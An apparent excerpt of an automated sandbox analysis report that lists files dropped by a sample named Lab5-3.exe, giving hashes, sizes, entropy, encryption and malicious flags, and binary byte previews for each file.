                                                                                                          SSDEEP:48:AWI2Py9ubQTzkiDOSzIMB9iD+jHfUTid3hBaUoSGFcmeykEdEElU92i:42qwcDDTKRGx0uKeY2ElUJ
                                                                                                          MD5:355CC5BF2A93465775E7FDC7DE44DED4
                                                                                                          SHA1:3079DD8A88F4EABED313160357CC22D89D877194
                                                                                                          SHA-256:3BCCF3E57DD2AB4F778AC8DF9710A432077FA86D95C8702C2E66AE92122813B8
                                                                                                          SHA-512:E61C78F2A1059ACF342E00B39E5C3B0C0AFF4E62C9C694FABC57A6E88A373B807BE44DE6B1E350721FBBC22CBF42599A243A6A4217C7FC327DC966C0FE75DC5F
                                                                                                          Malicious:false
                                                                                                          Preview:.l|..]..xe.../jz..k.:....n.....u.jZ.gc...j.YV.M.:<... .~w....6...g..4*.A...n}..f.0D...z.P.....a./&...(...!h6F..,.7b....Gk<.E......H$..P....2.oy...&.,.z.t....Yz!....-..o.oh.2P...qr.0a.{.b.fmHK.x...X....L...)G.`.u...|.@..v9....'..D...0.:&....t.qz.XGTBj]e.....-...'...3...h.2...@..$..:P........y....)iVR..Kp..!:.,.|....,.9...$.p....x.S..=pT....%2.e..J:5,,p.A.h.....#\.7D#..~..*.?....B......h/.N C..D*...........n..u...........%G70-7...._..@NR......L.2.pb....:.s........5@.t(....?L,.L.!.z.L|z<...mg...~..n+..s+Q0#......A.X..|.J..eV...7'....nC...x...O_....{..\.g,..........L...;.^iM.L.X9 .e...S..D.a.Ed{?....7..w...m......r[vAf..T.v..8N.......v.Q..F..O.ZjZ5..a....k..J...}.A..S..=...(dK].....j.....Yf....P.\q!W..RZ_:........\..K..........\.o..h.N)...T.y..g..Vt.C......P.....L.>.........Fy,.tK?h.F...:.q~e......G.R...C.;.!...A.,..j... ..f.#|.u..-..c.B....X.,(..{<.+..HM.../...(..............].!:.8.]&.>..TL..I..[.2p.K!....."s{.l....d.6<..9..W..8l...:.......I
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6976
                                                                                                          Entropy (8bit):7.971937533403345
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:rGqMUeUle5YisahoGXgK7bb/JMWMekIr/fxbog49ohHFKVoGTBqvtYOCn7Gx0uKk:rG1el+s4LD1r/1E9k2TgvCOCI0Cb
                                                                                                          MD5:92910222183565EF4C653F704A20909D
                                                                                                          SHA1:10BE9EABDF8502F87A446EB8762ADF54F7DB377A
                                                                                                          SHA-256:DEB12CA9AB891B38FF3A347C7141B336B441591E031D4950A8EFB46359770F16
                                                                                                          SHA-512:5D9C8285072036FC7854E2124E55B4C19784302B0B9948C006523250448AF3C019FF12F55635DEE402E9FDDA8D0D71EFB7C2C04CB8051925DE6B44FF5ECE71EA
                                                                                                          Malicious:false
                                                                                                          Preview:VB..}..}.....e.Wx.M-^*..4....dwho..&[6=#w..W#\,&...!9.4....v%....3..r.....k.0..G./R..D.e;.I.s.U.m...m....I._..........'K.S8.;:.:.....9.D.w...{a...H....JU....B...X...r.....]....$...5dny..5.uFLQ.N.....:..,:\.]Xz.......i.0.R.@\...........+.s...(HI.,j.`F*?."u.!OjS.R.....w.....zQ...4..R......D........s.g....r5O....Ws..Y`.g.[..<.z.c.........1..I.5.......H..O.....y\Ir..kw..?F.a..-7d.Z..`(7..Ov...N.S.a....'..l..YX<w.K.I...Pb....%.=..S..b...8.....D5R..F....+.Dp....?......%{.hV....`... Y..>6Z..1....MR.E.......H..."K..%.:..j.0...w...z.-......::..../n...@..%X.[G.pM.[*.M.#N.U.-...l.wi.....7..i..BkW(0R.:...........#?g..+....<..2.<{".b....;op%......C..m.y9.K..v...!O.a....0.B......49;.......]R+.>....l......f..#..~.........3.+<...ND.......d.2../F%.`.B.......6...|.9.b..2.].._Y1..E.J.W`.....@..<=toi.U.......$].....jd.....{.....^MY.D.`Cw;WN.=.".3j0.;.O...MQ..?...!R...D.}(*....xy.!K.."m..^........*U].....D.@;>..y.@..X.m.Ae..9...+.(V.!P.RM
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13856
                                                                                                          Entropy (8bit):7.988876597894625
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:uO1H499dyEgaQQnpdeX4qUIW/KBGkHQujdSgtb:ftnadeXRlXGkzjNZ
                                                                                                          MD5:685EEB87BCF86FA8AACB203AB0EC3C8F
                                                                                                          SHA1:34DF5F784F0723D9515BD7D1562DAD00DEFE1901
                                                                                                          SHA-256:DEED8D7AA74E96C4E12CF4533A91166DC751AD6754331ECFD65A753E441EBF57
                                                                                                          SHA-512:942674AB64D0A0AA5818C82BD140BD75805418BD97E19AB1857F20247378C9377BD1C95519C736E5DDEC489D2BB7BBCED6407D6E596DAF191FF9803DE8448A76
                                                                                                          Malicious:false
                                                                                                          Preview:.H-..|E%.@];.]......7n..:|..{zC...nk...]EI= .1.......@..X....8....0...........g.....[...F\... ...l.L.o.M.yKp.....W8.<..t.1....q.wn..X....h.xJrJ..c.'0.&...}<....p6/..y.j&$......9+=.\;....6Xb.B>.~aa.[.......lZ.K..6c.r!...|....$.H.x..UT-..Hje.e(..+.).@`#~.,S...&.^.L..tr..I%.`)[.N....]....>-...P.W.../.A.AG..8a...|.{.$.@W.......N...lp.o...&Q..cOc._.h~.9EH?(\.;.v.......4...P........bi8..p..j+%-e.I}.}.... .#.^%v.7...:-%.e..T..X.#m...w..C....-.........L.mb.z.....}..u;.i.~,..o^..3Yr2...:..82F...R.53.Q(`..IvU... :...m....x..1\.Z~..3ic...46.:..g.....3....|..yp...yL..mp.b?j.D[p.};..[..K..g.O"..8..:..t.C3.._... .y[|..+..k..W.....Y.$+>.j.X..-...~..w.......A.q......\...Q...f.d...2...~O..y.h05.9.e...zv....4........P:...6...z..6.7.+...+..........&.....r..?......S..WG.^.......=.J8....ku$.......d'.................W%F.....l.q.e..n.F...4{VO....Y.m.Qd.....:$|k..9.....{~.Q......O..+.p$.Z..eA.e.Z.Sr.)Ft0...hM....Dm.9..V....\.B..,O.....i..7cH..}f.Dl...>3..$.#
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3920
                                                                                                          Entropy (8bit):7.954739045479487
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:xOasJxrDNwOxkhZKKPAb4cN2XAaCGx0uKeY2ElUJ:sasJBNwjZLPM4oi0Cb
                                                                                                          MD5:6244A1671DEC8AA92F50AAF43BE05CEF
                                                                                                          SHA1:C9801AA9500B9671449B19D381A9E60157017579
                                                                                                          SHA-256:F426281FCD63380E32891C4F62F7160E8C390F518E178D2810CD67723D545913
                                                                                                          SHA-512:0913CF4FD80DED633E7732116D35166093532022C707639D272D5F56759A911AE0EC8BB238E476441580A499F11616BB1F806A013A09FDC389EDB8F29C1BD1B3
                                                                                                          Malicious:false
                                                                                                          Preview:..+..;xR.#1..B..{..<c..E.....i....iA..HGMz...W:.V..3..'....S.k^..I_.gRf....[.......7..P..-)...k..2......{....bW...Q.>...J..q.2o./....t.(58^.;.......W...s..a3!....]...o.m...OH....o..........&S..t.C~...!8.....n.-...E|..P.J.x~.D...'#......2...."..j.O.U......5..M...<c.....|-fk......j.JKL.._/C`R...a:_).~.a+...t....*.rQ..R....0....C..y..I.....=. ._|5.H.h.W)W......7S.3g...^.w......Q-V..V\~.....'....d.a..)..[....x.g.c.$.@:....".U..x=...i.F..d......5.ow.....z..z>k..:..Q{.'A*.Q.5*..<..a..0G.....8..h.......v.../..&.}.....h^..ias.'..US1..P.r.i....||.}U./..3..o..#3....0....7.K.......g....K.5u...z|-..j.....gp......T....X.4..[s.Y\.....6.....8..q..k...LU.s.[..n...W..E..&.........j.3..{Nj..........2.......k.[b.\.v........44.+.+*......|.....S.*=.ya.>..r...7..ul...tu..1D.sc.....AbD.tE'......4...8,0.. hs..v9...M.......N...5......p.Xo...f...t.VA..A.f8.W....@...y..B.L..#'`[.7...p..%..%i.&!...b....r..+.._.D.h.}.Z...r&9#.n......XT..'B .ntY..9-.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6560
                                                                                                          Entropy (8bit):7.970617641758834
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:4qLdO20xaNPJ3ccm0lYB7MMCExLjwC0Cb:4qBz0x2PJMh0ledCoJtb
                                                                                                          MD5:E93C3E889E3207A04192DD9081393840
                                                                                                          SHA1:3F2A05BAD6360CEAEA7BCF0288962F94AE239B49
                                                                                                          SHA-256:45BB2F0E7134B1A82814C57ECD3421D09DAB5F3889856D51B1617611CE14FF2E
                                                                                                          SHA-512:8513E8877AA3326276A2A000FB639034916EA912762E01B1CF40973EAAE753A65802EE97F9DCA46FA37701CF5BFB5ED9816228BF2571AC521D04E30FE4A4714C
                                                                                                          Malicious:false
                                                                                                          Preview:......fN./C....V..K`G)8Z.....7..QIu.U..+.=...dq..k;.L~...ID?.......X......0\Ox/........}."4.sZ.......F.c.3.B....%......T...Qa...".**..c...._.l.-D...b..j&.L.O0-..............<.--,HQ....\H...GN:.O..L..|7.?....*......(.t..m.=.<HB..[.k.8E.J.x.eQ.g..|.mC7r...G.}E.OV.............k.(.......0..+y...=..:.Z?...9....{Zi.{..Gt..G...!h.X.5H}.@Dn:&.t.w{...Q.......p9L..r.ge..Q....#1...j.4H.g.E(5....o..g......+e.Txd.]..Tj]..D...6g..)..."tj,..".x....'..:...n..d.k{...+.IkL.<.#vq.9.%...2..t..Z.. ..T.Sf>..;.....X......:2.9....0...s.~8.%....-.L..G...1.Kt.+...."...!.]z.....r]o....q..B..S..0`<9....../...y..~.#.4..*.~.J\./..4v.^/.2}x$..YF....C.0...r....b.V......2..U...\.ue.t.(0..'...U......uh....9!....Kv\."P.;B..W)-SC.GP&.. .Gn...l.!.U.U*'...:.e...4.a@.J...r._G>......+.....~j....+..MK......<z..s..s.\.N..^.*6.Lfd....G....:.e..s....E...Tw..c/#...)..mEz..I...........aJ....R..kC.kV.9.......oTnT.........2BM...J.dc_.....U.D|v.....E...._.}.YZ...dS.@I.^.....&.R.....Z.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:DOS executable (COM)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.923127350913461
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:EUvHFst3sxJLIA0QCrFHfUTid3hBaUoSGFcmeykEdEElU92i:DJfwCGx0uKeY2ElUJ
                                                                                                          MD5:21EF4B93E5EE5BCD13E800941AEA5530
                                                                                                          SHA1:531809A55842E81509FA6E69226D083B4E3BE909
                                                                                                          SHA-256:5B890EBEF2B68D4C62F6BD6980260E3562137312EDE13CAF2D1824A470DB70CD
                                                                                                          SHA-512:EB66679756947D05B37FE099633477BF007702FE6305B6B7FB85C541B47113A9089EDEBEF802BCB514FF67CA05E40757CA0B1CF6800249BDE12D2688EABDAD75
                                                                                                          Malicious:false
                                                                                                          Preview:...-.M..T..DI... j>X....t.!P.;.6......i.<?.....?..e.].t...W>=6.../B....1.......G.7.....(mC....m..../..Is.0.."18.Wy..?...x{`>bg....q......-QG..i.j..e......dv.;c....%.Zu.,~.}.l^.D%=./...?t..s.....N...BG........<D.d..l.`.....H][}....!.".]...H..`..TG.<..ysb...E6.5.`...t6.';....z..$..Q....F..[.5.O._....x_...U...Cos...'...8...._/o...5..`B.y..;..o.}.%.....Z,s....k.1N;.y.4d.....f.-.. .{dP..4&.=..4.xz..t....N...I..5T.&v,..u.>...~q....w.Ka..._.N...!..;..1..g.#!A.E..:.+.mwC..q.UMd..1.....h....=.I`S..k....uP.O.../4..8Q@.q1...b..d.........^..^u.Z...k=e'm..$;:.U..........h7T..v...O.&m.&........t.K[...G....jo.r_....vsS....{*'.|..n-..2...3!..yY}..n..3..@.......}/_......."M..F....t..W.0.R.P4.....c3.....h.&..O!..d..P.!.%^..<Z.yh0.m.k`.......;:.C......7..(..._.xe].a....;L.)....:.V.Q.|.[...e3..p.+tS..#.?.k.J......8.. r..4...%.e(t.R,=.K=..7.m.;....[.g....!Y...tu.AV'>*p....$..P.d..8..@.[.....TY#...D..i...^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5663120
                                                                                                          Entropy (8bit):7.990915471853538
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:98304:YJ4YXVQJMRkBVZ1KpmlQgxITC0KvKFj8ABRZgofltb8evvW1:DykBVZ1iSaHBFj8ABR5Tbg1
                                                                                                          MD5:A0BCE7D3CF5CF35F6D43710AB9462145
                                                                                                          SHA1:72079B5EBE83240F950C3F50FB49179B35BCDEDA
                                                                                                          SHA-256:C9EB46B7D6171E4C37A1BFB7FBF5BAC43BC8A347143C3C635B417BA9F20557C7
                                                                                                          SHA-512:A6A29FE0E5EDA82F64F8AABFB27678372397D8749F88C634CDF6CD75E867CF48B2E4469EDBD613D9F6F16B8F6EB25367DF869B09628177DEE88B85377574A806
                                                                                                          Malicious:true
                                                                                                          Preview:....D....i7[+v.F.....x@9i>Nn.W...Z...n5.....{.u....:\$.A..M....b.r...'....u...6H.T@E.....RR..v.....\..0%7.%.9...\g........@......nU.!.6..H.KI.,.#.\.?.....[.$XF.WU...[a.x..n..W.F....'...2*.).~=...>..t.}..3..a.2.N......n.'B..l.[\......F..9..xBjfXq...{].....9M..t.}....f.a.:.B.Vv.5.....a;..:\:.r...... .}.....xK..Ah...D!.[...$.l..,....Q..Be.....{.8.%.d.N!S.@..2T...3.qu..2....'...'.....z.;.u.].Y.h.......).O..{2.vj.K.'...,.....0]AD^B...o`..5R...rRa.{.`..kii1.D...^I.....Mui..7Te[...h@..F....x5.;....,...D5.<.....w|. .hU8.o=.lS........Z,F..n3.tO.8MC.....5}.!E..-.W."..(.g.^ ....<..s.Wx.q.....p..t\~......Z...e_.e.. ......M..F..|..<m.....J3.%..C...O.?3.........@3..;~.E...F;d.8Z..:.....b...%D...Q.~....N...].R.wy4...e...3.[...a..w.....yLJ.>.?......E.. ..E..s..9..z..B.k.b<.......y..l2Y..r..1..,...!K=H.v.z.a..8...:|x...N..S..d2./^y.8...^..o .\&....R.1...~M!p.mL..9A..D..Cf..S.P.....k8w..n....$.%.h+.)..F..."Hf.....D..r+.a...H)..ac..].. ...<].S]_...o..B%.t...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12912
                                                                                                          Entropy (8bit):7.9833534958830805
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:vDzgsMorJU/I/67pNE+JepL3sQFhgajrSwUh8HwDMbz9XgrbVu8nvZab0Cb:Nig/cGBLrngaPUC2CpXgrbU8nxItb
                                                                                                          MD5:E4CF42C47F45EEC09FE921F23D4508C5
                                                                                                          SHA1:DE235EBA1CF10B2D1BAD44D544945210FBA444E1
                                                                                                          SHA-256:27FC7F16D06680DDAA644E182F02A08B265DFE2A236F13732E20D94746DDE11F
                                                                                                          SHA-512:1B59CA1159BBFCFEB0C1B7E4EECB6E7A37A48DF8C88CD5B0B20C0BAC223B19C766CBE2A2D3452A1EAC78CAE97F96532B091BCE8B146C7AFBA95C8D28062011D7
                                                                                                          Malicious:false
                                                                                                          Preview:.hc6.......m=u.<...$...4a.D..Di.....Y.}.T8.e.eR..a6..lNi.q..fe T...(..e.....H..G...g..v.FfZ1Id.1....;K..;....7s9Jg*........[v ...$'....l.T.M8.B...n........d.m.rh.h...}......L.>R.7.JF<..|.*.........c....op...v.T.........0..k0....K.<..l....H.....:$r...[X..J.....7.,.LB.X.B....).ck.k.R.s.W.V..c........)<li....2...ZX...h.l...q...l.B..Oz8.v_H..v.R..$KB.............5...H.:o...=..s.*(}....m-..V........w.....J...I...z......#.5#....+.;..0.[p......QACTD..W......\w....m.7?a:.g4.e.)U.O2D.C.7..0.....M.......Qa..a..%.......e.U..h..T....Gq.._.D......s/...<...y..r.r..7.......H....P.u..L..;M.(.,T..1l.l...A....gD....5{.........ze..#..D*5..G...Hg&.*C..i..m.<.q.4..Of...12>I>.f8....5.K......0G.x.l...?c...q..... !..:c..u...k..T.R .Uw....XqX........L..7t%._.\......2>.~.....J....y...........S....Uu..Z....F*.!..a.[.*.%........@...........!.'......Ft. P=rHf........f<...)w..J..1.LO...._.*....l[.....[....5.I.".A...E.z..%b.G...h.:......d.rr....=.P.q.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20992
                                                                                                          Entropy (8bit):7.991006574106162
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:IEUcBtYRr/ybdn2wAAy5gWITD84o32sEKi7CoSN4PPk+jLKVFsaRZqd7Otb:IExSVabd2wAA9WI84E2csCoSN4PjPKMQ
                                                                                                          MD5:941366419E63FC9743E72840366085FD
                                                                                                          SHA1:A92E94444452CC72D89BAFB05B73D2331CCE059A
                                                                                                          SHA-256:272A9FAFFF3B540633CE9DCEF1975E7D4528022F1CC0E3DEDC88ACCBD170710B
                                                                                                          SHA-512:71FAB70E408197CEDA772000BE8DE565FF88953BD7D5F6428AE581787088C8D319252D21F7495BFDC3EB38BAC0F93051B936E7BBC93D8F1D33A12295C77A6DB6
                                                                                                          Malicious:true
                                                                                                          Preview:VapP'G.....85..M(.>w.%....F..6..`wVuV.....:._x........p...J..........;%..|vu.J>&.0..*.m.........(D..~..G..Ci\nA1..%.,...@.......n.....vG..w.\..C<.l.B...0x#..<..-..J5..m..6.X...5.i...1..#,3..Ih.+...6LH....-.j@V.|.Qs..a.......L............a..U.H.o.}X...3..<...S..%&XR.....a.&.j..........E..4Z0}.Sfe\D.,.y...Q....sx...$.....\..N.?m_.I........`..].;...`.,lO....]/...|vr.)y..A..Z;...J.......P.a.&Dn..8..q_7.G~o..r.......(S...)k.....2...eW....e.F.@n.YQ~...T.62.:...h.>..A.....94...!........g.....&.C..5........Cx.?)b.BW4.Z.k..4a.g....A.....,.5../...8..........'.O...# .!.h.....Y............cJ...a.#...B.<.@B.......5..D.&&...H....i....B.{an..>.u.g..... d....S...k_..{..o..vk....JW..#.[.......5....?=..{.Oi~."..5..Rp\0:*..[5.t...........`~/.K..c..3.fHv.d...8...WZ._....a*E.........a[.*.8h...HlOM....J,......zi@|o.%k2m.......s.M*...3mQ.A35p..g'......+........E...Sg.-.X.!..(.x.0.../.......>A..'1.t..Y...j..<..i.:.?|F'u.......p.T.r7.....`...@t-&.~r.[
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):24288
                                                                                                          Entropy (8bit):7.991637667969758
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:nn4EehQeaKCLixsrF4gDIGl81ntxo9Gbs38E1budCyuwLtCqoYq77Btm2gNim7Z0:7FKoYeF4+l8RsGbs3ZSdCyFS7d1gwWZ0
                                                                                                          MD5:A57B204830AA7A60AE78DCA73E3FCAC4
                                                                                                          SHA1:0CE84AC79636670AC338B3C7B4427559BD2790AC
                                                                                                          SHA-256:90BC61891956EE10E06BAF9F79B86ED915E892A636BA3D971463C6F44AF1A8F7
                                                                                                          SHA-512:F1F24559EB5CB46630452A95FF88078209CB8A18D64F4EC25774F2D17CBE6C0C91C5EE00AE860E7FD7A0F2EDE44E61E09F07ADA34ECA989BE17C0340A3079731
                                                                                                          Malicious:true
                                                                                                          Preview:9:K...r....bc.iH;.x?...:.Bv.....r.F.+..}.j&..V.~.X.^...G.....e.58..z4K.JHx.9.].t.!Fk?.s...w............WV..tD\.Ln.....kb.p.jV....?.S.?..&.4.. ...W.....<i.B.'.G.R^Q....|c...~...(.t...e,...1........q...K3H......5..|.$..A.a}.;K[.g..4lD<&j..s.._.......K...r..;...~...!oL..Y1..y.g.F.3Ca..........T...#?u.!n.[.&.Tz....<..A.h......g@.?1~\.!~.....Z...|.G.h..p._.....$w....#r....3.R.4{.......J.`........*...N.....0...0..g.....>...?...._..3...9..>....U.iu*)...!..[.o....?.s.II.-....f.2.GD....E_../...e..p.Y...(T....(..Rr+E...#o..".wp.O.8..l...2.d....&..w`)P.nK.H.d..."'v....0.yHMWm....4.Lq.5.......I..|}....=.K..j.....V......\............&H.8..YC.J.To...>*$6...ag0`.a..........._..{.,.Ah.Q.#.V...g.9....X..5Z...B$.K+[.q@=).....|.._......T|...&j.......<....w....#.L_m.......FZ......4.)bbvsU4........(..,...?.B..R...R2.`.r.h.&......... ..P...s.a-.M....=A....<.. .%..hiM..g}./".+Y....AO.Ap........#2..0l.l+.u.....9.UH.R..bF.2...`..M.US...|!/\J"...'..;B..O..p;.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2400
                                                                                                          Entropy (8bit):7.919892829423594
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:a+dB2DPgmUa8rgv3Tl9S5JpHfUTid3hBaUoSGFcmeykEdEElU92i:jBuygB9SqGx0uKeY2ElUJ
                                                                                                          MD5:E6D873AD0F218ABEFA122089C834DDCD
                                                                                                          SHA1:88AC11EC3712BCAD64DB8AB2BE766CF9710130E7
                                                                                                          SHA-256:A369C348D79313E7BE6C9A699D44BCAED4D8F6BEDA098FDF7EDF5ADCA4A0DAB9
                                                                                                          SHA-512:BB8B1C7CD5DAD2D233D3363499816457CF672C33755F130C947F10A6DBCE1FD31F11C17057FF5F42F022E320277F802161BE9122F21946385D07A84CDEA101F9
                                                                                                          Malicious:false
                                                                                                          Preview:....[..6....}@.CC%g..p.d@.>.8%..v...%........;...t...S..n..S0jtR.+Mu...}p.. ...U}.i..V....[K......4?.."7....J.....[.7.....K.C...uK...!(...rD?..z..Jt..Yf0....E.....a.D.z.i.2>..p....(v...`.iQ.."..u...I......@..X]...%.'..#.....N....3y...........T..R.u.Nv..a...9.......t.P.En..EnWn.~..&..87...g......7;1...E+.... '....Q.(... .(8/....+r.u(.s~9....[7.tl.+..LJ....\.4.49D(...3n...9w...K.aZ....>.'K3...`.m....B.;..a.a....K.5D...B,.M./.5[..(G..yiR.."v..^.9KY6...5]..Ah\{3T.Q..../..nF..Jt.N_...QF\..;.n.WH............k....&'Ir.-}v.....m1Q.n5...[TP6;..T...=...B^..s+3."..k..y.Ma..M|..4.....O.a'.......+{.}.Z..............7T8....N]..wuX#...%K.3..-..&Oo.yY.....W.[..It.<..X0.Q...(...G|z.vc.Rx.0..X._..........%4..)wn.P....(.XF..X'.C...o..nz....a..:g:........&...^]......uW\.s".........m.$.........Z..KD#..@...(3.P.g.n+...x..9.~.0R...W...W..v.Z<.3G~....Q.Tl...Z..R......B.,.!.Bs.,"G.3.....J.\.Tj*./?.j...p\..II...D^.-@.BR&+...}.&i.`.K....X.~..{..+L..:.x...-r'
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):22800
                                                                                                          Entropy (8bit):7.992709515345348
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:9+3+eEdVNC3LaqA/VphZpbyAmTi7GXIVp3eEvyu2WXo1MUQTw9XcO5YkLLaXNxpK:9Pw3LatLhZRTmW7Ff3eEquNo1GwJvOT8
                                                                                                          MD5:3E31C531350D315E996110726FE4014E
                                                                                                          SHA1:87EB20CC2B4E251288D58DA90729E7B94C3ADF89
                                                                                                          SHA-256:322DFCE6DE25FB386B4E2A07B7EC25C13293DF965E3BFEAF2EB2121446949B1F
                                                                                                          SHA-512:CA1E324D949C46C0567D6EE19A6A91655DDA96339DBC5366C3EA7C3D2F258E5EDCBB79FFBCB0F2EE89898DE432A289621A4731B5BE9ACC78ED88B16744C388D9
                                                                                                          Malicious:true
                                                                                                          Preview:..AZI..}l^..i..0.w..y6.P.}7 ..SV.W,..9...J..w8..2.K`....E02..hdh*..c......Q ....[#.ODPJ.yb.M.\v....f@,L2.$#.f.x...ir2....U...L.j.:..Xd.p2N]..k...(>HS..W.L.....t....IS....T.G.V..U.).H..G..r$..%.k.S..X.....\.........7O...s..J..N....j.......8......#..XC..e.......m...u?D."TK..9Q.........[....VV>2...Ml..EG.VS...u..-n....dN..f..Tvq..E.D.......a..Nh9^?I5.........)....b~F..*..!0... {..'.P.b..G...Rg8.{."\sk}.I..t<..F..._.z.........b.D.C.\.'|.....E.&....C..^Nq.rK...K._..KX.H.zz.p6{w.=.3T7;.L..k....'.%w..F&.s..G.MPb...O;9P2L....H.D..3V. ..bV....5.."....q.....Q.#."F+]r6|8).Ws....PA.Vq...Bg...II}.<5..gB..?3..V.EW..w...F.a..-......2.C..!.J2U.da..m5...Q.6A.......-....?..U,.-.s.%.[8.Y.dc\..:k.m+.B........L..i6.+...Wg-t..}...W...9+.....7q.7`.......A1.H...Wg5..j'..b.#...n".X..I.>AH...f..+R].;.{f...SG..m.<...b.GR............u0<k.....P......eS.....K.l.C)f.67.?.G..u3..4.. .....?!../......09.tn.#..!..C.q.|..0.......q....J..&@4..1....A9..=.e....1..T....^I...}/
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):22384
                                                                                                          Entropy (8bit):7.991947641510976
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:+Yw4HFSXvLhbkfD01UvPzlNMx1IXCnPFIeATjDQrFg7EE4WG8FOTjxgttb:+Ywa6Duf0gPz0xQWtTATOFg14WGSa9aZ
                                                                                                          MD5:0F05185E5AEE9CC39B787504BC351D7D
                                                                                                          SHA1:1BCD976F1DF2339FBF0203583A3AFA040F6BC4C7
                                                                                                          SHA-256:CA33093F8161A5FCA2F60CA87BF413ED4E6D2878B7187EF6FFAF1BD062FFB5DC
                                                                                                          SHA-512:BE28838ECA36B4502D1AC073F12C11F5CE9600753C4DBA955A020D4D29D2CE6465A8CF48BE7E792A2B5DA0D3F1BFAAD28686F2EC9C9CD3E5D96C464EAE9C3A37
                                                                                                          Malicious:true
                                                                                                          Preview:.[.Zu<..L.V.D...RgR4.......j....8.C..\>..=.G+|![.....h..p..p....J..KRQ..B......r..e..r..uoZ..x..._BC..P......&.....pG.q@.|..........,...j|......B.D.m.u].}... ..z....../).?...n.......mYp.W3..C....j...0.jW..R.|X./;.;^.RvT...6n..D...^....F..H..x.....V......r.u..<...../..-g..+v.-9..R.[f..D...........4.9p..........wL ...j.+.......5P...x.n:r.$N^@.....>K(..@W!...]....S...?..t..F8#..T....zU/ ..~$fT.Vs..O....J.........D.OX.I...X..o.k...?~..%/..$.n..h.:v4.k..E?.#.3-ou..z.qJde......,..7h+ir5.n.vL..I..j?....W..}D...y.K ....c.||e.9".`.>t..'...+.T;..n3.a-x@.,6.(..{_W....`W+.piDd..>1.U. .lj....M.h.v:.Oh.o..?..,?.$..$...`..]........b..*........3.L"C:......V...~.3....G.....km.C/..(."y.a.PSG....Zr...V...+.h1k*;J.....TL..(.c-...z..>.~.....G'.}....jA.....Y./.......i...3...2l..~.*.........nu.j3....j.*.O...).9..!....3.b/#...7Fd..:].Q.{.F.*t74...[....F..Q..G.h.XLK..<@..k.W.SV......\Z...#.%'A"<..d....L..}N...%i.R-.a.&.._.(SjP..d[.N5.:[....Q...B.#){cb.+;,zjw<g.B
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):24176
                                                                                                          Entropy (8bit):7.991466795637204
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:7fLTiGjJXumsL8FA6T23CBvT+XpucahWjr4cH0vuwUHZDa9OJxrzBYBH8PQzqdV3:rycJeRL8FFy3CBvT+X+hWjkcUvi2Uvyw
                                                                                                          MD5:83488ED366CFBC4722B6DFA94A307AA2
                                                                                                          SHA1:7B024A07C8D90A49C95061A390A3B240202F29C5
                                                                                                          SHA-256:6B22DB667EA9CE5CD279A72B528DB109FA964295E0EA619EBA96FC0BC8858DBA
                                                                                                          SHA-512:DC70ACD7A5825D0EA2FA58BC12236E23075B132FF5E97DC3FF340685840D7FFED7F7D69C5F8857A72DC3706DACC3C4958A75989F9A2FF93A5DC4E28464D540E0
                                                                                                          Malicious:true
